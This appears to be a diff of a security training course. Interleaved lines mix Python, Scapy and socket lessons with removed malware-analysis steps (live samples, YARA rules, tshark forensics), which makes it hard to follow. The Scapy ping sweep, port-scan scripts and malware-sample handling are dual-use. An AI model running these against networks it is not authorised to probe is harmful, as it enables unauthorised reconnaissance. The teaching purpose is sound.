746		- In the Linux machine, in the Terminal window, at the >>> prompt, type this command, and then press the Enter key:
747
748		i = IP()
749
750
751
752
753		- This creates an object named i of type IP. To see the properties of that object, use the display() method with this command:
754
755		i.display()
756
757
758
759
760		- Use these commands to set the destination IP address and display the properties of the i object again. Replace the IP address in the first command with the IP address of your target Windows machine:
761
762		i.dst="192.168.54.184"
763
764		i.display()
765
766
767
768
769		- Notice that scapy automatically fills in your machine's source IP address.
770
771		- Use these commands to create an object named ic of type ICMP and display its properties:
772
773
774		ic = ICMP()
775
776		ic.display()
777
778
779
780
781
782		- Use this command to send the packet onto the network and listen to a single packet in response. Note that the third character is the numeral 1, not a lowercase L:
783
784		sr1(i/ic)
785
786
787
788
789
790		- This command sends and receives one packet, of type IP at layer 3 and ICMP at layer 4.
791
792
793		- The Padding section shows the portion of the packet that carries higher-level data. In this case it contains only zeroes as padding.
794
795		- Use this command to send a packet that is IP at layer 3, ICMP at layer 4, and that contains data with your name in it (replace YOUR NAME with your own name):
796
797
798		sr1(i/ic/"YOUR NAME")
799
800
801		- You should see a reply with a Raw section containing your name.
802
803
804
805		###################################
806		# Sending a UDP Packet with Scapy #
807		###################################
808
809
810		- Preparing the Target
811		$ ncat -ulvp 4444
812
813
814
815
816		--open another terminal--
817		In the Linux machine, in the Terminal window, at the >>> prompt, type these commands, and then press the Enter key:
818
819		u = UDP()
820
821		u.display()
822
823
824
825		- This creates an object named u of type UDP, and displays its properties.
826
827		- Execute these commands to change the destination port to 4444 and display the properties again:
828
829		i.dst="192.168.54.184" <--- replace this with a host that you can run netcat on (ex: another VM or your host computer)
830
831		u.dport = 4444
832
833		u.display()
834
835
836
837		- Execute this command to send the packet to the Windows machine:
838
839		send(i/u/"YOUR NAME SENT VIA UDP\n")
840
841
842
843		- On the Windows target, you should see the message appear
844
845
846		p = sr1(IP(dst="8.8.8.8")/UDP()/DNS(rd=1,qd=DNSQR(qname="strategicsec.com")))
847
848
849		p=sr(IP(dst="192.168.230.2")/TCP(dport=[23,80,53,443]))
850
851
852		p=sr(IP(dst="192.168.230.2")/TCP(dport=[80]))
853
854
855		traceroute (["strategicsec.com"], maxttl=20)
856		This is actually an ICMP & TCP traceroute, default destination is port 80
857
858
859		traceroute (["strategicsec.com"], dport=443, maxttl=20)
860
861
862
863		############################
864		# Ping Sweeping with Scapy #
865		############################
866
867		----------------------------------------------------------------------
868		vi scapy-pingsweep.py
869
870
871		#!/usr/bin/python
872		from scapy.all import *
873
874		TIMEOUT = 2
875		conf.verb = 0
876		for ip in range(0, 256):
877		packet = IP(dst="192.168.1." + str(ip), ttl=20)/ICMP()
878		reply = sr1(packet, timeout=TIMEOUT)
879		if not (reply is None):
880		print reply.dst, "is online"
881		else:
882		print "Timeout waiting for %s" % packet[IP].dst
883		----------------------------------------------------------------------
884
885
886		###############################################
887		# Checking out some scapy based port scanners #
888		###############################################
889
890		wget https://s3.amazonaws.com/SecureNinja/Python/rdp_scan.py
891
892		cat rdp_scan.py
893
894		sudo python rdp_scan.py 192.168.1.250
895
896
897		#########################################
898		# Here is the courseware for this month #
899		#########################################
900
901		Class powerpoint slides:
902		https://s3.amazonaws.com/StrategicSec-Files/Python/PythonV3-1.pptx
903
904
905
906		Courseware Lab Manual
907		https://s3.amazonaws.com/StrategicSec-Files/Python/Python-For-InfoSec-Pros-2015.pdf
908
909
910
911		https://s3.amazonaws.com/infosecaddictsvirtualmachines/InfoSecAddictsVM.zip
912		user: infosecaddicts
913		pass: infosecaddicts
914
915
916		The youtube video playlist that I'd like for you to watch is located here:
917		https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA
918
919
920	-	Log in to your Ubuntu system with the username 'malware' and the password 'malware'.
920	+
921		# Installing Python#
922	-	After logging please open a terminal window and type the following commands:
922	+
923		Windows
924		32-Bit Version
925		http://www.python.org/ftp/python/2.7.5/python-2.7.5.msi
926
927	-	This is actual Malware (remmeber to run it in a VM - the password to extract it is 'infected':
927	+	64-Bit Version
928		http://www.python.org/ftp/python/2.7.5/python-2.7.5.amd64.msi
929
930	-	wget http://www.beenuarora.com/code/analyse_malware.py
930	+	After you install Python in Windows the next thing you may want to install is IdleX:
931		http://idlex.sourceforge.net/features.html
932
933	-	infected
933	+
934		Linux
935		Debian/Ubuntu: sudo apt-get install -y python
936		RHEL/CentOS/Fedora: sudo yum install -y python
937
938		After you install Python in Linux the next thing that you will need to do is install idle.
939
940		sudo apt-get install -y idle
941
942		Open IDLE, and let's just dive right in.
943
944
945
946	-	Reference: http://www.garykessler.net/library/file_sigs.html
946	+
947		#############################
948		# Lesson 1: Simple Printing #
949		#############################
950
951		>>> print "Today we are learning Python."
952
953
954
955
956
957
958		#####################################
959		# Lesson 2: Simple Numbers and Math #
960		#####################################
961
962		>>> 2+2
963
964		>>> 6-3
965	-	- We didn't see anything like HKLM, HKCU or other registry type stuff
965	+
966		>>> 18/7
967
968		>>> 18.0/7
969	-	strings malware.exe \| grep -i join
969	+
970		>>> 18.0/7.0
971
972		>>> 18/7
973
974		>>> 9%4
975
976	-	- List of IRC commands: https://en.wikipedia.org/wiki/List_of_Internet_Relay_Chat_commands
976	+	>>> 8%4
977
978		>>> 8.75%.5
979
980		>>> 6.*7
981
982		>>> 666
983
984		>>> 6**3
985
986		>>> 5**12
987
988		>>> -5**4
989
990
991
992
993
994
995		#######################
996		# Lesson 3: Variables #
997		#######################
998
999		>>> x=18
1000
1001		>>> x+15
1002
1003		>>> x**3
1004	-	infected
1004	+
1005		>>> y=54
1006
1007		>>> x+y
1008
1009		>>> g=input("Enter number here: ")
1010		43
1011
1012		>>> g+32
1013
1014	-	Step 1: Installing MySQL database
1014	+	>>> g**3
1015
1016
1017
1018	-
1018	+
1019	-	Step 2: Installing Python MySQLdb module
1019	+
1020
1021
1022
1023		###################################
1024		# Lesson 4: Modules and Functions #
1025		###################################
1026
1027		>>> 5**4
1028	-	mysql -u root -p (set a password of 'malware')
1028	+
1029		>>> pow(5,4)
1030	-	Then create one database by running following command:
1030	+
1031		>>> abs(-18)
1032
1033		>>> abs(5)
1034
1035		>>> floor(18.7)
1036
1037		>>> import math
1038	-	vi mal_to_db.py -i (fill in database connection information)
1038	+
1039		>>> math.floor(18.7)
1040
1041		>>> math.sqrt(81)
1042	-	python mal_to_db.py -i -f malware.exe -u
1042	+
1043		>>> joe = math.sqrt
1044
1045		>>> joe(9)
1046	-	malware
1046	+
1047		>>> joe=math.floor
1048
1049		>>> joe(19.8)
1050
1051
1052
1053
1054
1055
1056
1057		##################################
1058	-	##############################
1058	+	# Lesson 5: How to Save Programs #
1059	-	# Lesson 32: Setting up Yara #
1059	+	##################################
1060	-	##############################
1060	+	Run "IDLE (Python GUI)"
1061
1062		File -> New Window
1063	-	sudo apt-get install clamav clamav-freshclam
1063	+
1064		print "Python for InfoSec"
1065	-	sudo freshclam
1065	+
1066		File -> Save as
1067	-	sudo Clamscan
1067	+	py4InfoSec.py
1068
1069	-	sudo apt-get install libpcre3 libpcre3-dev
1069	+	Run -> Run Module or Press "F5"
1070
1071	-	wget https://github.com/plusvic/yara/archive/v3.1.0.tar.gz
1071	+
1072
1073	-	wget http://yara-project.googlecode.com/files/yara-python-1.4.tar.gz
1073	+
1074
1075	-	tar -zxvf v3.1.0.tar.gz
1075	+	Create a file name.py
1076
1077	-	cd yara-3.1.0/
1077	+	x = raw_input("Enter name: ")
1078		print "Hey " + x
1079		raw_input("Press<enter>")
1080
1081
1082		Run -> Run Module or Press "F5"
1083
1084
1085	-	make check
1085	+
1086
1087
1088
1089	-	cd yara-python/
1089	+
1090
1091	-	python setup.py build
1091	+	#####################
1092		# Lesson 6: Strings #
1093		#####################
1094
1095		>>> "XSS"
1096
1097		>>> 'SQLi'
1098
1099	-	wget https://malwarecookbook.googlecode.com/svn-history/r5/trunk/3/3/clamav_to_yara.py
1099	+	>>> "Joe's a python lover"
1100
1101	-	sigtool -u /var/lib/clamav/main.cvd
1101	+	>>> 'Joe\'s a python lover'
1102
1103	-	python clamav_to_yara.py -f main.ndb -o clamav.yara
1103	+	>>> "Joe said \"InfoSec is fun\" to me"
1104
1105		>>> a = "Joe"
1106
1107		>>> b = "McCray"
1108	-	infected
1108	+
1109		>>> a, b
1110	-	mkdir malcode/
1110	+
1111		>>> a+b
1112	-	mv malware.exe malcode/
1112	+
1113
1114	-	vi testrule.yara
1114	+
1115
1116	-	rule IsPE
1116	+
1117	-	{
1117	+
1118	-	meta:
1118	+
1119	-	description = "Windows executable file"
1119	+
1120		##########################
1121	-	condition:
1121	+	# Lesson 7: More Strings #
1122	-	// MZ signature at offset 0 and ...
1122	+
1123	-	uint16(0) == 0x5A4D and
1123	+
1124	-	// ... PE signature at offset stored in MZ header at 0x3C
1124	+	>>> num = 10
1125	-	uint32(uint32(0x3C)) == 0x00004550
1125	+
1126	-	}
1126	+	>>> num + 2
1127
1128	-	rule has_no_DEP
1128	+	>>> "The number of open ports found on this system is " + num
1129	-	{
1129	+
1130	-	meta:
1130	+	>>> num = str(18)
1131	-	description = "DEP is not enabled"
1131	+
1132		>>> "There are " + num + " vulnerabilities found in this environment."
1133	-	condition:
1133	+
1134	-	IsPE and
1134	+	>>> num2 = 46
1135	-	uint16(uint32(0x3C)+0x5E) & 0x00100 == 0
1135	+
1136	-	}
1136	+	>>> "As of 08/20/2012, the number of states that enacted the Security Breach Notification Law is " + `num2`
1137
1138	-	rule has_no_ASLR
1138	+
1139	-	{
1139	+
1140	-	meta:
1140	+
1141	-	description = "ASLR is not enabled"
1141	+
1142
1143	-	condition:
1143	+
1144	-	IsPE and
1144	+
1145	-	uint16(uint32(0x3C)+0x5E) & 0x0040 == 0
1145	+	#######################
1146	-	}
1146	+	# Lesson 8: Raw Input #
1147		#######################
1148		Run "IDLE (Python GUI)"
1149
1150	-	yara testrule.yara malcode/malware.exe
1150	+	File -> New Window
1151
1152	-	mkdir rules/
1152	+	joemccray=input("Enter name: ")
1153		print joemccray
1154	-	cd rules/
1154	+
1155
1156	-	wget https://malwarecookbook.googlecode.com/svn-history/r5/trunk/3/5/capabilities.yara
1156	+
1157		Run -> Run Module # Will throw an error
1158	-	wget https://malwarecookbook.googlecode.com/svn-history/r5/trunk/3/6/magic.yara
1158	+	or
1159		Press "F5"
1160	-	wget https://malwarecookbook.googlecode.com/svn-history/r5/trunk/3/4/packer.yara
1160	+
1161		File -> New Window
1162		joemccray=raw_input("Enter name: ")
1163
1164	-	yara rules/ malcode/malware.exe
1164	+	Run -> Run Module # Will throw an error
1165
1166	-	wget https://github.com/Xen0ph0n/YaraGenerator/archive/master.zip
1166	+	or
1167
1168		Press "F5"
1169
1170	-	cd YaraGenerator-master/
1170	+	NOTE:
1171		Use "input() for integers and expressions, and use raw_input() when you are dealing with strings.
1172	-	python yaraGenerator.py ../malcode/ -r Test-Rule-2 -a "Joe McCray" -d "Test Rule Made With Yara Generator" -t "TEST" -f "exe"
1172	+
1173
1174	-	cat Test-Rule-2.yar
1174	+
1175
1176	-	wget http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
1176	+
1177
1178	-	yara Test-Rule-2.yar putty.exe
1178	+
1179		#################################
1180		# Lesson 9: Sequences and Lists #
1181		#################################
1182
1183		>>> attacks = ['Stack Overflow', 'Heap Overflow', 'Integer Overflow', 'SQL Injection', 'Cross-Site Scripting', 'Remote File Include']
1184	-	# Additional Tasks #
1184	+
1185		>>> attacks
1186		['Stack Overflow', 'Heap Overflow', 'Integer Overflow', 'SQL Injection', 'Cross-Site Scripting', 'Remote File Include']
1187	-	- PE Scanner:
1187	+
1188	-	https://malwarecookbook.googlecode.com/svn/trunk/3/8/pescanner.py
1188	+	>>> attacks[3]
1189	-	http://www.beenuarora.com/code/analyse_malware.py
1189	+	'SQL Injection'
1190
1191	-	- AV submission:
1191	+	>>> attacks[-2]
1192	-	http://malwarecookbook.googlecode.com/svn/trunk/4/4/avsubmit.py
1192	+	'Cross-Site Scripting'
1193	-	https://raw.githubusercontent.com/dcmorton/MalwareTools/master/vtsubmit.py
1193	+
1194
1195	-	- Malware Database Creation:
1195	+
1196	-	https://raw.githubusercontent.com/dcmorton/MalwareTools/master/mal_to_db.py
1196	+
1197
1198
1199		##########################
1200		# Level 10: If Statement #
1201	-	cd /home/malware/Desktop/Browser\ Forensics
1201	+
1202		Run "IDLE (Python GUI)"
1203	-	ls \| grep pcap
1203	+
1204		File -> New Window
1205	-	perl chaosreader.pl suspicious-time.pcap
1205	+	attack="SQLI"
1206		if attack=="SQLI":
1207	-	firefox index.html
1207	+	print 'The attacker is using SQLI'
1208
1209	-	cat index.text \| grep -v '"' \| grep -oE "([0-9]+\.){3}[0-9]+.*\)"
1209	+
1210
1211	-	cat index.text \| grep -v '"' \| grep -oE "([0-9]+\.){3}[0-9]+.*\)" \| awk '{print $4, $5, $6}' \| sort \| uniq -c \| sort -nr
1211	+	Run -> Run Module or Press "F5"
1212
1213	-	sudo tshark -i eth0 -r suspicious-time.pcap -qz io,phs
1213	+	File >> New Window
1214		attack="XSS"
1215		if attack=="SQLI":
1216		print 'The attacker is using SQLI'
1217
1218	-	for i in session_00[0-9]*.www.html; do srcip=`cat "$i" \| grep 'www:\ ' \| awk '{print $2}' \| cut -d ':' -f1`; dstip=`cat "$i" \| grep 'www:\ ' \| awk '{print $4}' \| cut -d ':' -f1`; host=`cat "$i" \| grep 'Host:\ ' \| sort -u \| sed -e 's/Host:\ //g'`; echo "$srcip --> $dstip = $host"; done \| sort -u
1218	+
1219		Run -> Run Module or Press "F5"
1220
1221	-	tshark -r suspicious-time.pcap \| grep 'NB.20\>' \| sed -e 's/<[^>]>//g' \| awk '{print $3,$4,$9}' \| sort -u
1221	+
1222
1223		#############################
1224	-	tshark -r suspicious-time.pcap \| grep 'NB.1e\>' \| sed -e 's/<[^>]>//g' \| awk '{print $3,$4,$9}' \| sort -u
1224	+	# Reference Videos To Watch #
1225		#############################
1226		Here is your first set of youtube videos that I'd like for you to watch:
1227	-	tshark -r suspicious-time.pcap arp \| grep has \| awk '{print $3," -> ",$9}' \| tr -d '?'
1227	+	https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (watch videos 1-10)
1228
1229
1230	-	tshark –r suspicious-time.pcap -Tfields -e “eth.src” \| sort \| uniq
1230	+
1231
1232
1233	-	tshark -r suspicious-time.pcap -R "browser.command==1" -Tfields -e "ip.src" -e "browser.server" \| uniq
1233	+	####################################
1234		# Lesson 11: Intro to Log Analysis #
1235	-	tshark -r suspicious-time.pcap -Tfields -e "eth.src" \| sort \|uniq
1235	+	####################################
1236
1237	-	tshark -r suspicious-time.pcap -qz ip_hosts,tree
1237	+	Login to your StrategicSec Ubuntu machine. You can download the VM from the following link:
1238
1239	-	tshark -r suspicious-time.pcap -R "http.request" -Tfields -e "ip.src" -e "http.user_agent" \| uniq
1239	+	https://s3.amazonaws.com/infosecaddictsvirtualmachines/InfoSecAddictsVM.zip
1240		user: infosecaddicts
1241	-	tshark -r suspicious-time.pcap -R "dns" -T fields -e "ip.src" -e "dns.flags.response" -e "dns.qry.name"
1241	+	pass: infosecaddicts
1242
1243		Then execute the following commands:
1244	-	whois rapidshare.com.eyu32.ru
1244	+	---------------------------------------------------------------------------------------------------------
1245
1246	-	whois sploitme.com.cn
1246	+	NOTE: If you are still in your python interpreter then you must type exit() to get back to a regular command-prompt.
1247
1248		wget https://s3.amazonaws.com/SecureNinja/Python/access_log
1249
1250
1251		cat access_log \| grep 141.101.80.188
1252	-	tshark -r suspicious-time.pcap -R http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri \| awk '{print $1," -> ",$2, "\t: ","http://"$3$4}'
1252	+
1253		cat access_log \| grep 141.101.80.187
1254	-	tshark -r suspicious-time.pcap -R http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri \| awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' \| grep -v -e '\/image' -e '.css' -e '.ico' -e google -e 'honeynet.org'
1254	+
1255		cat access_log \| grep 108.162.216.204
1256	-	tshark -r suspicious-time.pcap -qz http_req,tree
1256	+
1257		cat access_log \| grep 173.245.53.160
1258	-	tshark -r suspicious-time.pcap -R "data-text-lines contains \"<script\"" -T fields -e frame.number -e ip.src -e ip.dst
1258	+
1259		---------------------------------------------------------
1260	-	tshark -r suspicious-time.pcap -R http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri \| awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' \| grep -v -e '\/image' -e '.css' -e '.ico' \| grep 10.0.3.15 \| sed -e 's/\?[^cse].*/\?\.\.\./g'
1260	+
1261		Google the following terms:
1262		- Python read file
1263		- Python read line
1264		- Python read from file
1265
1266
1267
1268
1269		########################################################
1270		# Lesson 12: Use Python to read in a file line by line #
1271		########################################################
1272
1273	-	*Takes a few min*
1273	+
1274		Reference:
1275		http://cmdlinetips.com/2011/08/three-ways-to-read-a-text-file-line-by-line-in-python/
1276
1277	-	cd foremost-1.5.7/
1277	+
1278
1279		---------------------------------------------------------
1280		vi logread1.py
1281
1282
1283		## Open the file with read only permit
1284		f = open('access_log', "r")
1285
1286		## use readlines to read all lines in the file
1287		## The variable "lines" is a list containing all lines
1288		lines = f.readlines()
1289
1290		print lines
1291
1292
1293		## close the file after reading the lines.
1294		f.close()
1295
1296		---------------------------------------------------------
1297
1298
1299		Google the following:
1300		- python difference between readlines and readline
1301		- python readlines and readline
1302
1303
1304
1305	-	python volatility hivescan -f ../hn_forensics.vmem
1305	+
1306
1307	-	for file in $(ls *.dmp); do echo $file; strings $file \| grep bankofamerica; done
1307	+	################################
1308		# Lesson 13: A quick challenge #
1309		################################
1310
1311		Can you write an if/then statement that looks for this IP and print "Found it"?
1312
1313
1314		141.101.81.187
1315
1316
1317
1318
1319
1320
1321		---------------------------------------------------------
1322		Hint 1: Use Python to look for a value in a list
1323
1324		Reference:
1325		http://www.wellho.net/mouth/1789_Looking-for-a-value-in-a-list-Python.html
1326
1327
1328
1329
1330		---------------------------------------------------------
1331		Hint 2: Use Python to prompt for user input
1332
1333		Reference:
1334		http://www.cyberciti.biz/faq/python-raw_input-examples/
1335
1336
1337
1338
1339		---------------------------------------------------------
1340		Hint 3: Use Python to search for a string in a list
1341
1342		Reference:
1343		http://stackoverflow.com/questions/4843158/check-if-a-python-list-item-contains-a-string-inside-another-string
1344
1345
1346
1347
1348
1349		Here is my solution:
1350		-------------------
1351		$ python
1352		>>> f = open('access_log', "r")
1353		>>> lines = f.readlines()
1354		>>> ip = '141.101.81.187'
1355		>>> for string in lines:
1356		... if ip in string:
1357		... print(string)
1358
1359
1360
1361
1362		Here is one student's solution - can you please explain each line of this code to me?
1363		-------------------------------------------------------------------------------------
1364		#!/usr/bin/python
1365
1366		f = open('access_log')
1367
1368		strUsrinput = raw_input("Enter IP Address: ")
1369
1370		for line in iter(f):
1371		ip = line.split(" - ")[0]
1372		if ip == strUsrinput:
1373		print line
1374
1375		f.close()
1376
1377
1378
1379
1380		-------------------------------
1381
1382		Working with another student after class we came up with another solution:
1383
1384		#!/usr/bin/env python
1385
1386
1387		# This line opens the log file
1388		f=open('access_log',"r")
1389
1390		# This line takes each line in the log file and stores it as an element in the list
1391		lines = f.readlines()
1392
1393
1394		# This lines stores the IP that the user types as a var called userinput
1395		userinput = raw_input("Enter the IP you want to search for: ")
1396
1397
1398
1399		# This combination for loop and nested if statement looks for the IP in the list called lines and prints the entire line if found.
1400		for ip in lines:
1401		if ip.find(userinput) != -1:
1402		print ip
1403
1404
1405
1406		##################################################
1407		# Lession 14: Look for web attacks in a log file #
1408		##################################################
1409
1410		In this lab we will be looking at the scan_log.py script and it will scan the server log to find out common hack attempts within your web server log.
1411		Supported attacks:
1412		1. SQL Injection
1413		2. Local File Inclusion
1414		3. Remote File Inclusion
1415		4. Cross-Site Scripting
1416
1417
1418
1419		wget https://s3.amazonaws.com/SecureNinja/Python/scan_log.py
1420
1421		The usage for scan_log.py is simple. You feed it an apache log file.
1422
1423		cat scan_log.py \| less (use your up/down arrow keys to look through the file)
1424
1425		Explain to me how this script works.
1426
1427
1428
1429		################################
1430		# Lesson 15: Parsing CSV Files #
1431		################################
1432
1433		Dealing with csv files
1434
1435		Reference:
1436		http://www.pythonforbeginners.com/systems-programming/using-the-csv-module-in-python/
1437
1438		Type the following commands:
1439		---------------------------------------------------------------------------------------------------------
1440
1441		wget https://s3.amazonaws.com/SecureNinja/Python/class_nessus.csv
1442
1443
1444		Example 1 - Reading CSV files
1445		-----------------------------
1446		#To be able to read csv formated files, we will first have to import the
1447		#csv module.
1448
1449
1450		import csv
1451		with open('class_nessus.csv', 'rb') as f:
1452		reader = csv.reader(f)
1453		for row in reader:
1454		print row
1455
1456
1457
1458
1459
1460
1461		Example 2 - Reading CSV files
1462		-----------------------------
1463		vi readcsv.py
1464
1465
1466		#!/usr/bin/python
1467		import csv # imports the csv module
1468		import sys # imports the sys module
1469
1470		f = open(sys.argv[1], 'rb') # opens the csv file
1471		try:
1472		reader = csv.reader(f) # creates the reader object
1473		for row in reader: # iterates the rows of the file in orders
1474		print row # prints each row
1475		finally:
1476		f.close() # closing
1477
1478
1479
1480
1481
1482
1483		Example 3 - - Reading CSV files
1484		-------------------------------
1485		vi readcsv2.py
1486
1487
1488		#!/usr/bin/python
1489		# This program will then read it and displays its contents.
1490
1491
1492		import csv
1493
1494		ifile = open('class_nessus.csv', "rb")
1495		reader = csv.reader(ifile)
1496
1497		rownum = 0
1498		for row in reader:
1499		# Save header row.
1500		if rownum == 0:
1501		header = row
1502		else:
1503		colnum = 0
1504		for col in row:
1505		print '%-8s: %s' % (header[colnum], col)
1506		colnum += 1
1507
1508		rownum += 1
1509
1510		ifile.close()
1511
1512
1513
1514
1515
1516
1517
1518
1519		python readcsv2.py \| less
1520
1521
1522
1523
1524
1525
1526
1527
1528		/---------------------------------------------------/
1529		--------------------PARSING CSV FILES----------------
1530		/---------------------------------------------------/
1531
1532		-------------TASK 1------------
1533		vi readcsv3.py
1534
1535		#!/usr/bin/python
1536		import csv
1537		f = open('class_nessus.csv', 'rb')
1538		try:
1539		rownum = 0
1540		reader = csv.reader(f)
1541		for row in reader:
1542		#Save header row.
1543		if rownum == 0:
1544		header = row
1545		else:
1546		colnum = 0
1547		if row[3].lower() == 'high':
1548		print '%-1s: %s %-1s: %s %-1s: %s %-1s: %s' % (header[3], row[3],header[4], row[4],header[5], row[5],header[6], row[6])
1549		rownum += 1
1550		finally:
1551		f.close()
1552
1553
1554
1555
1556
1557		python readcsv3.py \| less
1558
1559		-------------TASK 2------------
1560		vi readcsv4.py
1561
1562		#!/usr/bin/python
1563		import csv
1564		f = open('class_nessus.csv', 'rb')
1565		try:
1566		print '/---------------------------------------------------/'
1567		rownum = 0
1568		hosts = {}
1569		reader = csv.reader(f)
1570		for row in reader:
1571		# Save header row.
1572		if rownum == 0:
1573		header = row
1574		else:
1575		colnum = 0
1576		if row[3].lower() == 'high' and row[4] not in hosts:
1577		hosts[row[4]] = row[4]
1578		print '%-1s: %s %-1s: %s %-1s: %s %-1s: %s' % (header[3], row[3],header[4], row[4],header[5], row[5],header[6], row[6])
1579		rownum += 1
1580		finally:
1581		f.close()
1582
1583
1584		python readcsv4.py \| less
1585
1586
1587
1588
1589
1590
1591
1592
1593
1594
1595
1596
1597
1598
1599		#################################################
1600		# Lesson 16: Parsing Packets with Python's DPKT #
1601		#################################################
1602		The first thing that you will need to do is install dpkt.
1603
1604		sudo apt-get install -y python-dpkt
1605
1606
1607
1608
1609		Now cd to your courseware directory, and the cd into the subfolder '2-PCAP-Parsing/Resources'.
1610		Run tcpdump to capture a .pcap file that we will use for the next exercise
1611
1612
1613		sudo tcpdump -ni eth0 -s0 -w quick.pcap
1614
1615
1616		--open another command prompt--
1617		wget http://packetlife.net/media/library/12/tcpdump.pdf
1618
1619
1620		Let's do something simple:
1621
1622
1623		vi quickpcap.py
1624		--------------------------------------------------------
1625
1626		#!/usr/bin/python
1627		import dpkt;
1628
1629		# Simple script to read the timestamps in a pcap file
1630		# Reference: http://superbabyfeng.blogspot.com/2009/05/dpkt-tutorial-0-simple-example-how-to.html
1631
1632		f = open("quick.pcap","rb")
1633		pcap = dpkt.pcap.Reader(f)
1634
1635		for ts, buf in pcap:
1636		print ts;
1637
1638		f.close();
1639
1640
1641		--------------------------------------------------------
1642
1643		Now let's run the script we just wrote
1644
1645
1646		python quickpcap.py
1647
1648
1649
1650
1651		How dpkt breaks down a packet:
1652
1653		Reference:
1654		http://superbabyfeng.blogspot.com/2009/05/dpkt-tutorial-1-dpkt-sub-modules.html
1655
1656		src: the MAC address of SOURCE.
1657		dst: The MAC address of DESTINATION
1658		type: The protocol type of contained ethernet payload.
1659
1660		The allowed values are listed in the file "ethernet.py",
1661		such as:
1662		a) ETH_TYPE_IP: It means that the ethernet payload is IP layer data.
1663		b) ETH_TYPE_IPX: Means that the ethernet payload is IPX layer data.
1664
1665
1666		References:
1667		http://stackoverflow.com/questions/6337878/parsing-pcap-files-with-dpkt-python
1668
1669
1670
1671
1672
1673
1674		Ok - now let's have a look at pcapparsing.py
1675
1676		sudo tcpdump -ni eth0 -s0 -w capture-100.pcap
1677
1678
1679		--open another command prompt--
1680		wget http://packetlife.net/media/library/13/Wireshark_Display_Filters.pdf
1681
1682
1683
1684		Ok - now let's have a look at pcapparsing.py
1685		--------------------------------------------------------
1686
1687		import socket
1688		import dpkt
1689		import sys
1690		f = open('capture-100.pcap','r')
1691		pcapReader = dpkt.pcap.Reader(f)
1692
1693		for ts,data in pcapReader:
1694		ether = dpkt.ethernet.Ethernet(data)
1695		if ether.type != dpkt.ethernet.ETH_TYPE_IP: raise
1696		ip = ether.data
1697		tcp = ip.data
1698		src = socket.inet_ntoa(ip.src)
1699		srcport = tcp.sport
1700		dst = socket.inet_ntoa(ip.dst)
1701		dstport = tcp.dport
1702		print "src: %s (port : %s)-> dest: %s (port %s)" % (src,srcport ,dst,dstport)
1703
1704		f.close()
1705
1706		--------------------------------------------------------
1707
1708
1709
1710		OK - let's run it:
1711		python pcapparsing.py
1712
1713
1714
1715		running this script might throw an error like this:
1716
1717		Traceback (most recent call last):
1718		File "pcapparsing.py", line 9, in <module>
1719		if ether.type != dpkt.ethernet.ETH_TYPE_IP: raise
1720
1721
1722		If it does it is just because your packet has something in it that we didn't specify (maybe ICMP, or something)
1723
1724
1725
1726
1727		Your homework for today...
1728
1729
1730		Rewrite this pcapparsing.py so that it prints out the timestamp, the source and destination IP addresses, and the source and destination ports.
1731
1732
1733
1734
1735
1736
1737		Your challenge is to fix the Traceback error
1738
1739
1740
1741
1742		#!/usr/bin/python
1743
1744		import pcapy
1745		import dpkt
1746		import sys
1747		import socket
1748		import struct
1749
1750		SINGLE_SHOT = False
1751
1752		# list all the network devices
1753		pcapy.findalldevs()
1754
1755		iface = "eth0"
1756		filter = "arp"
1757		max_bytes = 1024
1758		promiscuous = False
1759		read_timeout = 100 # in milliseconds
1760
1761		pc = pcapy.open_live( iface, max_bytes, promiscuous, read_timeout )
1762		pc.setfilter( filter )
1763
1764		# callback for received packets
1765		def recv_pkts( hdr, data ):
1766		packet = dpkt.ethernet.Ethernet( data )
1767
1768		print type( packet.data )
1769		print "ipsrc: %s, ipdst: %s" %( \
1770		socket.inet_ntoa( packet.data.spa ), \
1771		socket.inet_ntoa( packet.data.tpa ) )
1772
1773		print "macsrc: %s, macdst: %s " % (
1774		"%x:%x:%x:%x:%x:%x" % struct.unpack("BBBBBB",packet.data.sha),
1775		"%x:%x:%x:%x:%x:%x" % struct.unpack("BBBBBB",packet.data.tha ) )
1776
1777		if SINGLE_SHOT:
1778		header, data = pc.next()
1779		sys.exit(0)
1780		else:
1781		packet_limit = -1 # infinite
1782		pc.loop( packet_limit, recv_pkts ) # capture packets
1783
1784
1785
1786
1787
1788
1789
1790
1791		#############################
1792		# Reference Videos To Watch #
1793		#############################
1794		Here is your second set of youtube videos that I'd like for you to watch:
1795		https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (watch videos 11-20)
1796
1797
1798
1799
1800		#############################################
1801		# Lesson 17: Python Sockets & Port Scanning #
1802		#############################################
1803
1804
1805		$ ncat -l -v -p 1234
1806
1807
1808
1809
1810		--open another terminal--
1811		python
1812
1813		>>> import socket
1814		>>> s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
1815		>>> s.connect(('localhost', 1234))
1816		>>> s.send('Hello, world')
1817		>>> data = s.recv(1024)
1818		>>> s.close()
1819
1820		>>> print 'Received', data
1821
1822
1823
1824
1825
1826
1827		########################################
1828		# Lesson 18: TCP Client and TCP Server #
1829		########################################
1830
1831		vi tcpclient.py
1832
1833
1834
1835		#!/usr/bin/python
1836		# tcpclient.py
1837
1838		import socket
1839
1840		s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
1841		hostport = ("127.0.0.1", 1337)
1842		s.connect(hostport)
1843		s.send("Hello\n")
1844		buf = s.recv(1024)
1845		print "Received", buf
1846
1847
1848
1849
1850
1851
1852
1853
1854
1855		vi tcpserver.py
1856
1857
1858
1859
1860
1861		#!/usr/bin/python
1862		# tcpserver.py
1863
1864		import socket
1865
1866		s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
1867		hostport = ("", 1337)
1868		s.bind(hostport)
1869		s.listen(10)
1870		while 1:
1871		cli,addr = s.accept()
1872		print "Connection from", addr
1873		buf = cli.recv(1024)
1874		print "Received", buf
1875		if buf == "Hello\n":
1876		cli.send("Server ID 1\n")
1877		cli.close()
1878
1879
1880
1881
1882
1883
1884
1885
1886		python tcpserver.py
1887
1888
1889		--open another terminal--
1890		python tcpclient.py
1891
1892
1893		########################################
1894		# Lesson 19: UDP Client and UDP Server #
1895		########################################
1896
1897		vi udpclient.py
1898
